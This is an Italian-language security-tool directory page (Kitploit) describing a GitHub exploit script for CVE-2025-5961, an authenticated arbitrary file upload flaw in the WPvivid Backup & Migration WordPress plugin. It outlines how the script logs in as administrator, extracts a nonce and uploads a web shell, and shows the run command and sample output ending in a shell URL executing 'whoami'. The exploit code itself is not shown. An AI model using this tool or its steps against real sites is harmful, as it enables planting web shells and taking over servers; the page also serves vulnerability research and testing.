Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5961 — Migrazione, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Autenticato (Amministratore+) Caricamento Arbitrario di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-5961
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubnxploited/cve-2025-5961

CVE-2025-5961

Migrazione, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Autenticato (Amministratore+) Caricamento Arbitrario di File

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚨 Migration, Backup, Staging – WPvivid Backup & Migration <= 0.9.116 - Caricamento Arbitrario di File Autenticato (Amministratore+)

📈 Questa vulnerabilità riguarda un plugin con oltre 700.000+ installazioni


📝 Dettagli CVE

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (Alto)
  • Pubblicato: 3 luglio 2025

🔍 Descrizione

Il plugin Migration, Backup, Staging – WPvivid Backup & Migration per WordPress è vulnerabile al caricamento arbitrario di file a causa della mancata validazione del tipo di file nella funzione wpvivid_upload_import_files in tutte le versioni fino alla 0.9.116 inclusa.

Ciò consente ad attaccanti autenticati (livello Amministratore o superiore) di caricare file arbitrari sul server, consentendo potenzialmente l'esecuzione remota di codice.


🧰 Script

Questo repository contiene uno script di exploit per CVE-2025-5961, scritto in Python, che:

  • Controlla la versione del plugin.
  • Effettua l'accesso come Amministratore.
  • Estrae il nonce richiesto dalla pagina del plugin.
  • Carica un payload di web shell.
  • Stampa l'URL per accedere alla shell.

🖥️ Esempio di Utilizzo

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ Utilizzo

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 Esempio di Output

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ Disclaimer

Questo script è fornito solo a scopo educativo e di ricerca.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


✍️ Autore

Khaled Alenazi (Nxploited)
🌐 GitHub


Scarica lo strumento